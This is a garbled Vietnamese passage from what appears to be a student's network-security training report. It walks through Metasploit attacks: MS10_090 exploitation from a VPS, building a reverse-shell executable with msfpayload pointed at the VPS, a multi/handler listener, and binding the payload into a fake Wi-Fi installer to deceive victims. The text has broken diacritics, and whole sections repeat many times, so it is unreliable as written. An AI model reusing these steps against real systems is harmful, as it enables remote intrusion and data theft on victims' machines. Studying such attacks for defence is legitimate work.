việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
